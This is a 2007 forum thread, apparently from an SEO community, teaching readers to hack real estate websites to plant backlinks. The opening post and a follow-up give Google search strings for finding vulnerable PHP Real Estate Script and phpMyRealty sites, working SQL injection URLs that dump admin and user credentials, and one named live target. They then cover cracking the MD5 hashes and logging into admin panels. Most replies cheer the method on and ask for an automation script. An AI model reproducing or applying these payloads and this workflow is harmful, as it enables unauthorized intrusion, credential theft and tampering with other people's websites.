Exploiting For BackLinks #1

Murk · #1 (**permalink**) 12-18-2007, 01:21 PM

Exploiting For BackLinks #1

T0pPSuZz reported an exploit on Milw0rm.com for the very heavily used PHP Real Estate Script. This exploit is a simple SQL injection vulnerability that ultimately will allow you to retrieve admin login details in plain text. Once login details have been recovered, we can login to the Real Estate admin panel and add our links.

Ok, search the following in Google;
"Browse with Interactive Map"

My search returned over 2800 results. . . . drool. In this example I would recommend skipping to the 8th or 9th page of results as many of the first page listing have already been hacked, or otherwise defaced.

Below is a site running the script we are trying to exploit

The site above is a perfect example, and yes it is a real live target out there. Now the exploit works like this;

Code:

www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

so we replace

Code:

http://www.emerald-city.ca/buy.php

with

Code:

http://www.emerald-city.ca/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

and we get the following;

As you can see the Administrator login is in plain site. Now all we have to do is login by going to /admin/ now go add some back links.

~Enjoy

Murk · #2 (**permalink**) 12-18-2007, 01:26 PM

a little perl script and I can do 7 links an hour. I know that isn't much however if you do your PR research a head of time it can turn out very well.

**SmallStorm** · #3 (**permalink**) 12-18-2007, 01:35 PM

Quote:

Originally Posted by Murk

a little perl script and I can do 7 links an hour. I know that isn't much however if you do your PR research a head of time it can turn out very well.

Every bit counts.

Good post. Thanks.

Chris

**sageman** · #4 (**permalink**) 12-18-2007, 01:37 PM

damn!!! all of them have been hacked already!

Murk · #5 (**permalink**) 12-18-2007, 01:43 PM

keep digging at the end, there are still plenty~

Murk · #6 (**permalink**) 12-19-2007, 12:08 AM

here is another fresh one just publicly reported today....hurry up before they are all gone!

search;

Quote:

Powered by phpMyRealty

Then access the urls like such;
For admin user name and password

Quote:

thesitenamehere/search.php?type=-1+union+select+concat_ws(char(58),login,password)+ from+pmr_admins

For the listing of users and passwords

Quote:

/search.php?type=-1+union+select+concat_ws(char(58),login,password)+ from+pmr_users

Grab the MD5 password(s) and enter them into your favorite password crack. MD5 password hashs will look like the following:

Quote:

21232f297a57a5a743894a0e4a801fc3

Once crack you can login to the admin panel by going to;

Quote:

thesitenamehere/admin/index.php

enjoy~

**Aare** · #7 (**permalink**) 12-19-2007, 09:03 PM

Quote:

Originally Posted by Murk

a little perl script and I can do 7 links an hour. I know that isn't much however if you do your PR research a head of time it can turn out very well.

Murk, this may be a lifesaver since Im starting a whitehat real estate portal.
I know this may be arrogent to ask but do you share your perl script?

Great post. (Mürk means "poison" in my language

)

mono · #8 (**permalink**) 12-19-2007, 10:29 PM

Great post!
This is some really advanced stuff!

**chaser** · #9 (**permalink**) 12-20-2007, 06:20 AM

It is illegal. Your butts will burn in hell!